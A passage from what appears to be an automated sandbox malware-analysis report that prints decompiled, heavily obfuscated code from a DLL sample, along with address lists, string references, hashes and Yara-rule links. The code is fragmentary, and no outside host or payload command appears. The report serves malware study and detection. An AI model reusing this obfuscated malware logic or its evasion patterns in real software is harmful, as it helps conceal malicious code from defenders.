						}
						_t228 = 0x23b8b33e;
						goto L1;
					}
					if(_t228 == 0x3278c10e) {
						_t191 = E1001A527(_v96, _v72, _t229,  &_v40, _v52);
						_t227 = _t191;
						_t230 =  &(_t230[3]);
						if(_t191 == 0) {
							L18:
							return _t204;
						}
						_t228 = 0x2c08842d;
						goto L1;
					}
					if(_t228 != 0x39266751) {
						goto L24;
					}
					E1000B6C7(_v64, _v44, _t227, _v68);
					goto L18;
					L24:
				} while (_t228 != 0x1d8064a0);
				goto L18;
			}

0x10007b6a
0x10007b6d
0x10007b77
0x10007b80
0x10007b82
0x10007b86
0x10007b8e
0x10007b96
0x10007ba8
0x10007bac
0x10007bb1
0x10007bb9
0x10007bc1
0x10007bc9
0x10007bd1
0x10007bd9
0x10007be1
0x10007be9
0x10007bee
0x10007bf6
0x10007bfe
0x10007c06
0x10007c13
0x10007c14
0x10007c18
0x10007c20
0x10007c28
0x10007c30
0x10007c38
0x10007c40
0x10007c48
0x10007c50
0x10007c58
0x10007c60
0x10007c68
0x10007c6d
0x10007c72
0x10007c7a
0x10007c87
0x10007c8b
0x10007c93
0x10007c9b
0x10007ca9
0x10007cad
0x10007cb5
0x10007cbd
0x10007cc5
0x10007ccd
0x10007cd5
0x10007cdd
0x10007ce5
0x10007ced
0x10007cf1
0x10007cf9
0x10007d06
0x10007d0a
0x10007d0f
0x10007d17
0x10007d1f
0x10007d24
0x10007d2c
0x10007d34
0x10007d3c
0x10007d46
0x10007d4a
0x10007d52
0x10007d5a
0x10007d62
0x10007d6a
0x10007d72
0x10007d7a
0x10007d82
0x10007d87
0x10007d8f
0x10007d97
0x10007d9f
0x10007da9
0x10007dad
0x10007db5
0x10007dbd
0x10007dc2
0x10007dca
0x10007dd2
0x10007ddf
0x10007de3
0x10007deb
0x10007def
0x10007def
0x10007df3
0x10007df3
0x10007df3
0x10007df3
0x10007df9
0x00000000
0x00000000
0x10007dff
0x10007ed8
0x10007edd
0x10007ee0
0x00000000
0x10007ee0
0x10007e0b
0x10007eb8
0x10007eba
0x00000000
0x10007eba
0x10007e17
0x10007e73
0x10007e89
0x10007e8e
0x10007e9a
0x10007e9d
0x10007e9e
0x10007ea3
0x00000000
0x10007ea3
0x10007e1f
0x10007e64
0x00000000
0x10007e64
0x10007e27
0x00000000
0x10007e2d
0x10007e32
0x10007e37
0x10007e4d
0x10007e52
0x10007e55
0x10007e5b
0x10007e5d
0x10007e5d
0x10007e5b
0x00000000
0x10007e37
0x10007e27
0x10007ef0
0x10007f64
0x10007f70
0x00000000
0x10007f70
0x10007f66
0x00000000
0x10007f66
0x10007ef8
0x10007f32
0x10007f37
0x10007f39
0x10007f3e
0x10007f19
0x10007f1f
0x10007f1f
0x10007f40
0x00000000
0x10007f40
0x10007f00
0x00000000
0x00000000
0x10007f0f
0x00000000
0x10007f75
0x10007f75
0x00000000

Strings

Qg&9, xrefs: 10007EE0
Qg&9, xrefs: 10007EFA
|, xrefs: 10007DB5
Qg&9, xrefs: 10007E32
>', xrefs: 10007BC1
Im, xrefs: 10007B86
\d, xrefs: 10007D72
[, xrefs: 10007CF9
N, xrefs: 10007D34
`Y, xrefs: 10007DCA
cf, xrefs: 10007C58

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: >'$Im$Qg&9$Qg&9$Qg&9$[$\d$`Y$cf$N$|
API String ID: 0-888967344
Opcode ID: 92915673033651ef62aa5d2ea11e9bf4990f06b262b8c3dfb26e5a1cc969140f
Instruction ID: 4d9df0ae18d3920f5a27fe6632e8b5fc11ea73d69ac23d6d558e6aa02b608c48
Opcode Fuzzy Hash: 92915673033651ef62aa5d2ea11e9bf4990f06b262b8c3dfb26e5a1cc969140f
Instruction Fuzzy Hash: 3DA101718083819FE354CF25C48A41BFBE1FB84398F504A2DF99A96264D7B9DA49CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1000AE9E, Relevance: 13.9, Strings: 11, Instructions: 190
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1000AE9E() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				void* _t188;
				intOrPtr _t189;
				intOrPtr _t191;
				void* _t197;
				void* _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int* _t232;

				_t232 =  &_v1116;
				_v1100 = 0x726c;
				_v1100 = _v1100 >> 8;
				_t197 = 0xf88ef23;
				_v1100 = _v1100 * 0x62;
				_t225 = 0;
				_v1100 = _v1100 ^ 0x00003d3f;
				_v1052 = 0xd5b0;
				_v1052 = _v1052 + 0x85eb;
				_v1052 = _v1052 ^ 0x0001051a;
				_v1044 = 0x605;
				_t226 = 0x56;
				_v1044 = _v1044 * 0x13;
				_v1044 = _v1044 ^ 0x00000d30;
				_v1084 = 0xbf18;
				_v1084 = _v1084 * 0x6a;
				_v1084 = _v1084 + 0x7c6e;
				_v1084 = _v1084 ^ 0x004fd331;
				_v1056 = 0x656e;
				_v1056 = _v1056 << 5;
				_v1056 = _v1056 ^ 0x000cd085;
				_v1064 = 0x5058;
				_v1064 = _v1064 + 0x923d;
				_v1064 = _v1064 ^ 0x0000a913;
				_v1048 = 0x5371;
				_v1048 = _v1048 | 0xa724eab7;
				_v1048 = _v1048 ^ 0xa724f8b0;
				_v1108 = 0x680c;
				_v1108 = _v1108 + 0xf3c3;
				_v1108 = _v1108 << 9;
				_v1108 = _v1108 + 0xffff05f3;
				_v1108 = _v1108 ^ 0x02b68cd1;
				_v1072 = 0xb934;
				_v1072 = _v1072 ^ 0xf9670a56;
				_v1072 = _v1072 << 6;
				_v1072 = _v1072 ^ 0x59ece3aa;
				_v1088 = 0x384f;
				_v1088 = _v1088 / _t226;
				_v1088 = _v1088 >> 7;
				_v1088 = _v1088 ^ 0x0000111f;
				_v1068 = 0xd9c0;
				_v1068 = _v1068 ^ 0x004a16a2;
				_t227 = 0x21;
				_v1068 = _v1068 / _t227;
				_v1068 = _v1068 ^ 0x00026820;
				_v1116 = 0xfe2e;
				_v1116 = _v1116 ^ 0x1c13907b;
				_v1116 = _v1116 + 0xffff6187;
				_v1116 = _v1116 | 0x6657de64;
				_v1116 = _v1116 ^ 0x7e57afe4;
				_v1092 = 0x4960;
				_t228 = 0x2a;
				_v1092 = _v1092 / _t228;
				_v1092 = _v1092 << 4;
				_v1092 = _v1092 ^ 0x0000179c;
				_v1060 = 0x35ac;
				_v1060 = _v1060 * 0x1a;
				_v1060 = _v1060 ^ 0x00052097;
				_v1080 = 0x3e8c;
				_v1080 = _v1080 + 0x5b56;
				_v1080 = _v1080 ^ 0xef3bac3e;
				_v1080 = _v1080 ^ 0xef3b3737;
				_v1104 = 0xc45d;
				_t229 = 0xd;
				_v1104 = _v1104 / _t229;
				_v1104 = _v1104 | 0xf2014d02;
				_v1104 = _v1104 << 5;
				_v1104 = _v1104 ^ 0x40298872;
				_v1112 = 0x43fc;
				_v1112 = _v1112 << 0xf;
				_v1112 = _v1112 >> 0xd;
				_v1112 = _v1112 << 0xc;
				_v1112 = _v1112 ^ 0x10ff4448;
				_v1096 = 0x7eea;
				_v1096 = _v1096 >> 4;
				_v1096 = _v1096 >> 0xc;
				_v1096 = _v1096 ^ 0x0000730d;
				_v1076 = 0x6703;
				_v1076 = _v1076 + 0x5edc;
				_v1076 = _v1076 + 0xffffd6dd;
				_v1076 = _v1076 ^ 0x0000e956;
				do {
					while(_t197 != 0xbba1daf) {
						if(_t197 == 0xf88ef23) {
							_t197 = 0x13af662d;
							continue;
						} else {
							if(_t197 == 0x13af662d) {
								_push(_t197);
								E1001B82F( &_v520, _v1100, __eflags, _v1052);
								_t197 = 0x28bb809c;
								continue;
							} else {
								if(_t197 == 0x1ee8b77a) {
									E10001EF9(_v1096, _v1076,  &_v1040);
								} else {
									_t239 = _t197 - 0x28bb809c;
									if(_t197 != 0x28bb809c) {
										goto L10;
									} else {
										_push(_v1064);
										_push(_v1056);
										_push(_v1084);
										_t188 = E1000B871(0x10001574, _v1044, _t239);
										_t189 =  *0x10021fd8; // 0x0
										_t191 =  *0x10021fd8; // 0x0
										E1000487B(_v1108, _t239, 0x10001574, _v1072, _v1088, _t188,  &_v1040, _t191 + 0x1c, _v1068, _t189 + 0x22c);
										E1000717B(_v1116, _v1092, _v1060, _t188, _v1080);
										_t232 =  &(_t232[0xe]);
										_t197 = 0xbba1daf;
										continue;
									}
								}
							}
						}
						L13:
						return _t225;
					}
					__eflags = E1001DD80( &_v520, _v1104, __eflags,  &_v1040, _v1112);
					_t225 =  !=  ? 1 : _t225;
					_t197 = 0x1ee8b77a;
					L10:
					__eflags = _t197 - 0x1eaa1505;
				} while (__eflags != 0);
				goto L13;
			}

0x1000ae9e
0x1000aea4
0x1000aeae
0x1000aeb3
0x1000aec1
0x1000aec5
0x1000aec7
0x1000aecf
0x1000aed7
0x1000aedf
0x1000aee7
0x1000aef6
0x1000aef9
0x1000aefd
0x1000af05
0x1000af12
0x1000af16
0x1000af1e
0x1000af26
0x1000af2e
0x1000af33
0x1000af3b
0x1000af43
0x1000af4b
0x1000af53
0x1000af5b
0x1000af63
0x1000af6b
0x1000af73
0x1000af7b
0x1000af80
0x1000af88
0x1000af90
0x1000af98
0x1000afa0
0x1000afa5
0x1000afad
0x1000afbd
0x1000afc1
0x1000afc6
0x1000afce
0x1000afd6
0x1000afe2
0x1000afe7
0x1000afed
0x1000aff5
0x1000affd
0x1000b005
0x1000b00d
0x1000b015
0x1000b01d
0x1000b029
0x1000b02c
0x1000b030
0x1000b035
0x1000b03d
0x1000b04a
0x1000b04e
0x1000b056
0x1000b05e
0x1000b066
0x1000b06e
0x1000b076
0x1000b08b
0x1000b093
0x1000b097
0x1000b09f
0x1000b0a4
0x1000b0ac
0x1000b0b4
0x1000b0b9
0x1000b0be
0x1000b0c3
0x1000b0cb
0x1000b0d3
0x1000b0d8
0x1000b0dd
0x1000b0e5
0x1000b0ed
0x1000b0f5
0x1000b0fd
0x1000b105
0x1000b105
0x1000b117
0x1000b1cd
0x00000000
0x1000b11d
0x1000b11f
0x1000b1af
0x1000b1bf
0x1000b1c6
0x00000000
0x1000b125
0x1000b12b
0x1000b217
0x1000b131
0x1000b131
0x1000b133
0x00000000
0x1000b139
0x1000b139
0x1000b142
0x1000b146
0x1000b14e
0x1000b158
0x1000b167
0x1000b187
0x1000b19d
0x1000b1a2
0x1000b1a5
0x00000000
0x1000b1a5
0x1000b133
0x1000b12b
0x1000b11f
0x1000b21d
0x1000b229
0x1000b229
0x1000b1f2
0x1000b1f4
0x1000b1f7
0x1000b1fc
0x1000b1fc
0x1000b1fc
0x00000000

Strings

O8, xrefs: 1000AFAD
XP, xrefs: 1000AF3B
ne, xrefs: 1000AF26
77;, xrefs: 1000B06E
qS, xrefs: 1000AF53
?=, xrefs: 1000AEC7
s, xrefs: 1000B0DD
lr, xrefs: 1000AEA4
0, xrefs: 1000AEFD
`I, xrefs: 1000B01D
V, xrefs: 1000B0FD

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: s$0$77;$?=$O8$V$XP$`I$lr$ne$qS
API String ID: 0-3626900128
Opcode ID: 7e1cbafbb10551b7311f619fbf4cf2b9dc852359ec00cab757d95b28147b499d
Instruction ID: dfbb0d8a1d3003722d8a24e8ab6e49c3b818ffb89ec4a9dfa6a92392b576fa32
Opcode Fuzzy Hash: 7e1cbafbb10551b7311f619fbf4cf2b9dc852359ec00cab757d95b28147b499d
Instruction Fuzzy Hash: 6E9151715093819BE358CF24D98945FBBE1FBC0B98F50491DF582862A0C7B9DA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 1001732F, Relevance: 12.9, Strings: 10, Instructions: 365
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E1001732F(intOrPtr __ecx, intOrPtr* __edx) {
				char _v524;
				intOrPtr _v536;
				char _v540;
				intOrPtr* _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				unsigned int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				void* _t357;
				void* _t360;
				void* _t365;
				void* _t370;
				void* _t372;
				intOrPtr _t375;
				intOrPtr _t378;
				intOrPtr _t383;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				void* _t391;
				void* _t408;
				intOrPtr _t428;
				signed int _t429;
				intOrPtr _t433;
				signed int* _t434;
				void* _t437;

				_t434 =  &_v700;
				_v548 = _v548 & 0x00000000;
				_v624 = 0x6fc4;
				_v624 = _v624 | 0xd3b0e4af;
				_v624 = _v624 ^ 0xd1b0efef;
				_v564 = 0xaf4a;
				_v564 = _v564 + 0xffffed4b;
				_v564 = _v564 ^ 0x0000fb48;
				_v696 = 0x990d;
				_v696 = _v696 >> 6;
				_v696 = _v696 ^ 0x82f2f127;
				_v696 = _v696 * 6;
				_t433 = __ecx;
				_v696 = _v696 ^ 0x11b1e2ab;
				_t429 = 0x5f677de;
				_v612 = 0x3bad;
				_v612 = _v612 + 0xffff8a12;
				_v612 = _v612 >> 9;
				_v612 = _v612 ^ 0x007f9077;
				_v604 = 0x219a;
				_v544 = __edx;
				_t386 = 0x43;
				_v604 = _v604 * 0x79;
				_v604 = _v604 + 0xd6fb;
				_v604 = _v604 ^ 0x00108ce9;
				_v648 = 0x6db9;
				_v648 = _v648 ^ 0xa9574d5f;
				_v648 = _v648 * 0x71;
				_v648 = _v648 ^ 0xbf75a039;
				_v600 = 0xc0b9;
				_v600 = _v600 * 0x2c;
				_v600 = _v600 ^ 0x00211002;
				_v636 = 0x5835;
				_v636 = _v636 << 2;
				_v636 = _v636 ^ 0xd7d3e90f;
				_v636 = _v636 ^ 0xd7d2f8da;
				_v700 = 0xb647;
				_v700 = _v700 * 0x1a;
				_v700 = _v700 << 0xa;
				_v700 = _v700 << 2;
				_v700 = _v700 ^ 0x28334094;
				_v552 = 0xcd7d;
				_v552 = _v552 * 0x2b;
				_v552 = _v552 ^ 0x0022e597;
				_v644 = 0xa259;
				_v644 = _v644 << 3;
				_v644 = _v644 / _t386;
				_v644 = _v644 ^ 0x0000446c;
				_v656 = 0xdad;
				_v656 = _v656 | 0xdae8c9fe;
				_v656 = _v656 ^ 0xdae89310;
				_v692 = 0x3818;
				_v692 = _v692 | 0xefdbfbf6;
				_v692 = _v692 + 0xffffdad6;
				_v692 = _v692 ^ 0xefdbce1d;
				_v556 = 0x5a0a;
				_t96 =  &_v556; // 0x5a0a
				_v556 =  *_t96 * 0x2f;
				_v556 = _v556 ^ 0x00108112;
				_v580 = 0xe130;
				_v580 = _v580 >> 0xf;
				_v580 = _v580 ^ 0x00000d90;
				_v560 = 0xaa3e;
				_v560 = _v560 + 0xffff45be;
				_v560 = _v560 ^ 0xffffbf6e;
				_v684 = 0x7e7e;
				_v684 = _v684 ^ 0x955957b3;
				_v684 = _v684 | 0xbfcaee9f;
				_v684 = _v684 ^ 0xbfdb98e9;
				_v572 = 0xa177;
				_v572 = _v572 | 0x1a729641;
				_v572 = _v572 ^ 0x1a72cba0;
				_v628 = 0x811b;
				_v628 = _v628 << 4;
				_v628 = _v628 + 0xffff7f4a;
				_v628 = _v628 ^ 0x0007e780;
				_v592 = 0xcc1b;
				_t387 = 0x1b;
				_v592 = _v592 / _t387;
				_v592 = _v592 ^ 0x00006485;
				_v596 = 0x79fd;
				_v596 = _v596 + 0xffff17ed;
				_v596 = _v596 ^ 0xffffb717;
				_v668 = 0x2449;
				_v668 = _v668 >> 0xd;
				_t388 = 0x3d;
				_v668 = _v668 * 0x6d;
				_v668 = _v668 + 0xffffefa0;
				_v668 = _v668 ^ 0xffffd283;
				_v676 = 0xd4bb;
				_v676 = _v676 >> 0xd;
				_v676 = _v676 ^ 0xe0f0d5b9;
				_v676 = _v676 ^ 0xe0f0f239;
				_v620 = 0xfc77;
				_v620 = _v620 ^ 0xbade3416;
				_v620 = _v620 >> 7;
				_v620 = _v620 ^ 0x0175924e;
				_v672 = 0x1510;
				_v672 = _v672 >> 8;
				_v672 = _v672 ^ 0x1b44bde2;
				_v672 = _v672 + 0xa18;
				_v672 = _v672 ^ 0x1b44da12;
				_v588 = 0x33c3;
				_v588 = _v588 / _t388;
				_v588 = _v588 ^ 0x00002348;
				_v688 = 0x5ffd;
				_v688 = _v688 << 1;
				_v688 = _v688 ^ 0x8578eae5;
				_v688 = _v688 | 0xbac51d6d;
				_v688 = _v688 ^ 0xbffd21ef;
				_v664 = 0x1cb4;
				_v664 = _v664 | 0xbf732eda;
				_t389 = 0x5a;
				_v664 = _v664 / _t389;
				_v664 = _v664 ^ 0x98651170;
				_v664 = _v664 ^ 0x9a45bcfd;
				_v680 = 0xecdb;
				_v680 = _v680 | 0xa048dfa2;
				_t390 = 0x72;
				_v680 = _v680 / _t390;
				_v680 = _v680 + 0x8a48;
				_v680 = _v680 ^ 0x01683be5;
				_v608 = 0xd9d;
				_v608 = _v608 ^ 0x4dc1e3e3;
				_v608 = _v608 >> 4;
				_v608 = _v608 ^ 0x04dc0190;
				_v640 = 0x8193;
				_v640 = _v640 + 0xffff3f03;
				_v640 = _v640 + 0xffff96f8;
				_v640 = _v640 ^ 0xffff2495;
				_v652 = 0xe440;
				_v652 = _v652 >> 2;
				_t383 = _v544;
				_t428 = _v544;
				_v652 = _v652 * 0x45;
				_v652 = _v652 ^ 0x000f13e9;
				_v616 = 0x7c6f;
				_v616 = _v616 ^ 0xf512bdf7;
				_v616 = _v616 ^ 0x1b266013;
				_v616 = _v616 ^ 0xee34a277;
				_v632 = 0x785a;
				_v632 = _v632 << 2;
				_v632 = _v632 << 0xd;
				_v632 = _v632 ^ 0x3c2d42fe;
				_v568 = 0x85a7;
				_v568 = _v568 >> 8;
				_v568 = _v568 ^ 0x000038f6;
				_v660 = 0x398d;
				_v660 = _v660 + 0xffffe79d;
				_v660 = _v660 << 4;
				_v660 = _v660 | 0xa58ea543;
				_v660 = _v660 ^ 0xa58ecc99;
				_v576 = 0xc3e4;
				_v576 = _v576 ^ 0x784a0268;
				_v576 = _v576 ^ 0x784a8df6;
				_v584 = 0x5606;
				_v584 = _v584 + 0x8c73;
				_v584 = _v584 ^ 0x0000f59e;
				while(1) {
					L1:
					_t357 = 0x1f25111e;
					while(1) {
						L2:
						_t391 = 0x37a7634b;
						do {
							while(1) {
								L3:
								_t437 = _t429 - 0x89f01fe;
								if(_t437 > 0) {
									break;
								}
								if(_t437 == 0) {
									_t422 = _v544;
									_t370 = E100084D8(_t433, _v544, 0x1000109c,  &_v524);
									__eflags = _t370;
									_t357 = 0x1f25111e;
									if(_t370 == 0) {
										__eflags = _t383 - 0x1f25111e;
										if(__eflags == 0) {
											_t422 = _v552;
											E1000ADFC(_v700, _v552, _v548, _v644);
											_t357 = 0x1f25111e;
										}
										_t429 = 0x29c58d72;
										L2:
										_t391 = 0x37a7634b;
										continue;
									}
									__eflags = _t383 - 0x1f25111e;
									_t391 = 0x37a7634b;
									_t429 =  ==  ? 0x37a7634b : 0x1a8b64b;
									continue;
								}
								if(_t429 == 0x1a8b64b) {
									_push(_v664);
									_push( &_v540);
									_push(_t391);
									_push(_v688);
									_push(_v588);
									_t422 = _v672;
									_push(0);
									_push(0);
									_t372 = E1001B0D5( &_v524, _v672, __eflags);
									_t434 =  &(_t434[7]);
									__eflags = _t372;
									if(__eflags != 0) {
										E1000ADFC(_v680, _v608, _v540, _v640);
										_t422 = _v616;
										E1000ADFC(_v652, _v616, _v536, _v632);
										_t434 =  &(_t434[4]);
									}
									L16:
									_t429 = 0x27cbcfd;
									while(1) {
										L1:
										_t357 = 0x1f25111e;
										goto L2;
									}
								}
								if(_t429 == 0x27cbcfd) {
									 *((intOrPtr*)(_t428 + 0x34)) = _t433;
									_t375 =  *0x1002140c; // 0x0
									 *((intOrPtr*)(_t428 + 0x2c)) = _t375;
									 *0x1002140c = _t428;
									return _t375;
								}
								if(_t429 == 0x52557b1) {
									__eflags = _t383 - _t357;
									if(__eflags != 0) {
										_t429 = 0x89f01fe;
										continue;
									}
									_push(_v636);
									_push(_t391);
									_t422 = _v648;
									E1001E689(_v624, _v648,  &_v548, _t391, _v600);
									_t434 =  &(_t434[5]);
									asm("sbb esi, esi");
									_t429 = (_t429 & 0xded9748c) + 0x29c58d72;
									while(1) {
										L1:
										_t357 = 0x1f25111e;
										goto L2;
									}
								}
								if(_t429 != 0x5f677de) {
									goto L29;
								}
								_push(_t391);
								_t408 = 0x3c;
								_t378 = E1000A0AD(_t408, _t422);
								_t428 = _t378;
								if(_t428 == 0) {
									return _t378;
								}
								_t429 = 0xc1f5988;
								goto L1;
							}
							__eflags = _t429 - 0xc1f5988;
							if(_t429 == 0xc1f5988) {
								_t360 = E100183DE(_t391);
								__eflags = E1001E8F0() - _t360;
								_t357 = 0x1f25111e;
								_t429 = 0x52557b1;
								_t383 =  !=  ? 0x1f25111e : 0x2d729af7;
								_t391 = 0x37a7634b;
								goto L29;
							}
							__eflags = _t429 - 0x29c58d72;
							if(_t429 == 0x29c58d72) {
								return E100033F4(_v568, _v660, _v576, _v584, _t428);
							}
							__eflags = _t429 - _t391;
							if(_t429 != _t391) {
								goto L29;
							}
							_push(_v580);
							_push(_t391);
							_t365 = E1001197B(_v548, _v656,  &_v540,  &_v524, _v692, _v556, _t391);
							_t434 =  &(_t434[7]);
							__eflags = _t365;
							if(_t365 != 0) {
								E1000ADFC(_v560, _v684, _v540, _v572);
								E1000ADFC(_v628, _v592, _v536, _v596);
								_t434 =  &(_t434[4]);
							}
							_t422 = _v676;
							E1000ADFC(_v668, _v676, _v548, _v620);
							goto L16;
							L29:
							__eflags = _t429 - 0xc241d59;
						} while (__eflags != 0);
						return _t357;
					}
				}
			}

0x1001732f
0x10017335
0x1001733d
0x1001734d
0x10017355
0x1001735d
0x10017368
0x10017373
0x1001737e
0x10017386
0x1001738b
0x1001739c
0x100173a0
0x100173a2
0x100173aa
0x100173af
0x100173b7
0x100173bf
0x100173c4
0x100173cc
0x100173d9
0x100173e4
0x100173e5
0x100173e9
0x100173f1
0x100173f9
0x10017401
0x1001740e
0x10017412
0x1001741a
0x10017427
0x1001742b
0x10017433
0x1001743b
0x10017440
0x10017448
0x10017450
0x1001745d
0x10017461
0x10017466
0x1001746b
0x10017473
0x10017486
0x1001748d
0x10017498
0x100174a0
0x100174ab
0x100174af
0x100174b7
0x100174bf
0x100174c7
0x100174cf
0x100174d7
0x100174df
0x100174e7
0x100174ef
0x100174fa
0x10017502
0x10017509
0x10017514
0x1001751f
0x10017527
0x10017532
0x1001753d
0x10017548
0x10017553
0x1001755b
0x10017565
0x1001756d
0x10017575
0x10017580
0x1001758b
0x10017596
0x1001759e
0x100175a3
0x100175ab
0x100175b3
0x100175c1
0x100175c6
0x100175cf
0x100175da
0x100175e2
0x100175ea
0x100175f2
0x100175fa
0x10017604
0x10017607
0x1001760b
0x10017613
0x1001761b
0x1001762b
0x10017630
0x10017638
0x10017640
0x10017648
0x10017650
0x10017655
0x1001765d
0x10017665
0x1001766a
0x10017672
0x1001767a
0x10017682
0x10017698
0x1001769f
0x100176aa
0x100176b2
0x100176b6
0x100176be
0x100176c6
0x100176ce
0x100176d6
0x100176e2
0x100176e7
0x100176ed
0x100176f5
0x100176fd
0x10017705
0x10017711
0x10017714
0x10017718
0x10017720
0x10017728
0x10017730
0x10017738
0x1001773d
0x10017745
0x1001774d
0x10017755
0x1001775d
0x10017765
0x1001776d
0x10017777
0x1001777e
0x10017785
0x10017789
0x10017791
0x10017799
0x100177a1
0x100177a9
0x100177b1
0x100177b9
0x100177be
0x100177c3
0x100177cb
0x100177d6
0x100177de
0x100177e9
0x100177f1
0x100177f9
0x100177fe
0x10017806
0x1001780e
0x10017819
0x10017824
0x1001782f
0x1001783a
0x10017845
0x10017850
0x10017850
0x10017850
0x10017855
0x10017855
0x10017855
0x1001785a
0x1001785a
0x1001785a
0x1001785a
0x10017860
0x00000000
0x00000000
0x10017866
0x10017973
0x10017989
0x1001798f
0x10017991
0x10017997
0x100179ad
0x100179af
0x100179b5
0x100179c7
0x100179ce
0x100179ce
0x100179d3
0x10017855
0x10017855
0x00000000
0x10017855
0x10017999
0x100179a0
0x100179a5
0x00000000
0x100179a5
0x10017872
0x10017903
0x1001790e
0x1001790f
0x10017910
0x1001791b
0x10017922
0x10017926
0x10017928
0x1001792a
0x1001792f
0x10017932
0x10017934
0x10017949
0x10017952
0x10017961
0x10017966
0x10017966
0x10017969
0x10017969
0x10017850
0x10017850
0x10017850
0x00000000
0x10017850
0x10017850
0x1001787e
0x10017ad1
0x10017ad4
0x10017ad9
0x10017adc
0x00000000
0x10017adc
0x1001788a
0x100178be
0x100178c0
0x100178f9
0x00000000
0x100178f9
0x100178c2
0x100178cd
0x100178d2
0x100178dc
0x100178e1
0x100178e6
0x100178ee
0x10017850
0x10017850
0x10017850
0x00000000
0x10017850
0x10017850
0x10017892
0x00000000
0x00000000
0x100178a3
0x100178a6
0x100178a7
0x100178ac
0x100178b1
0x10017b10
0x10017b10
0x100178b7
0x00000000
0x100178b7
0x100179dd
0x100179e3
0x10017a9e
0x10017aaa
0x10017ab1
0x10017ab6
0x10017abb
0x10017abe
0x00000000
0x10017abe
0x100179e9
0x100179ef
0x00000000
0x10017b03
0x100179f5
0x100179f7
0x00000000
0x00000000
0x100179fd
0x10017a0b
0x10017a2c
0x10017a31
0x10017a34
0x10017a36
0x10017a51
0x10017a6f
0x10017a74
0x10017a74
0x10017a7b
0x10017a8a
0x00000000
0x10017ac3
0x10017ac3
0x10017ac3
0x00000000
0x1001785a
0x10017855

Strings

Z\:, xrefs: 100174FA
~~, xrefs: 10017553
lD, xrefs: 100174AF
@, xrefs: 10017765
H#, xrefs: 1001769F
o|, xrefs: 10017791
I$, xrefs: 100175F2
Zx, xrefs: 100177B1
5X, xrefs: 10017433
0, xrefs: 10017514

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Z\:$0$5X$@$H#$I$$Zx$lD$o|$~~
API String ID: 0-3052698863
Opcode ID: b4c5a9c5f25bdb458e2f9540d18644d706789873a466a875c4be8353b4e73704
Instruction ID: 93d9356f7b1d096158c15a0c7498b2e1f05b2d2b15ef0053890fdecc19eea55a
Opcode Fuzzy Hash: b4c5a9c5f25bdb458e2f9540d18644d706789873a466a875c4be8353b4e73704
Instruction Fuzzy Hash: 091232715083818FE368CF64C58AA4BBBF1FBC5344F508A1DE5DA8A2A0D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10013F16, Relevance: 12.8, Strings: 10, Instructions: 344
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10013F16() {
				signed int _t343;
				signed int _t349;
				void* _t356;
				signed int _t357;
				void* _t359;
				void* _t366;
				intOrPtr _t405;
				signed int _t407;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				void* _t419;
				signed int _t421;
				void* _t425;

				 *(_t425 + 0x38) = 0x4897;
				 *(_t425 + 0x38) =  *(_t425 + 0x38) ^ 0xa0a1aef4;
				_t366 = 0x5902d7e;
				 *(_t425 + 0x38) =  *(_t425 + 0x38) | 0x089368c9;
				 *(_t425 + 0x38) =  *(_t425 + 0x38) ^ 0xa8b3eeea;
				 *(_t425 + 0x54) = 0x6349;
				 *(_t425 + 0x54) =  *(_t425 + 0x54) + 0xffffc1c1;
				 *(_t425 + 0x54) =  *(_t425 + 0x54) ^ 0x01d10d77;
				 *(_t425 + 0x54) =  *(_t425 + 0x54) ^ 0x01d1287c;
				 *(_t425 + 0x28) = 4;
				 *(_t425 + 0x28) =  *(_t425 + 0x28) >> 5;
				 *(_t425 + 0x38) =  *(_t425 + 0x28) * 0x39;
				 *(_t425 + 0x38) =  *(_t425 + 0x38) ^ 0x00000a9e;
				 *(_t425 + 0x24) = 0x3c2b;
				 *(_t425 + 0x24) =  *(_t425 + 0x24) | 0xa2eb8918;
				 *(_t425 + 0x24) =  *(_t425 + 0x24) >> 8;
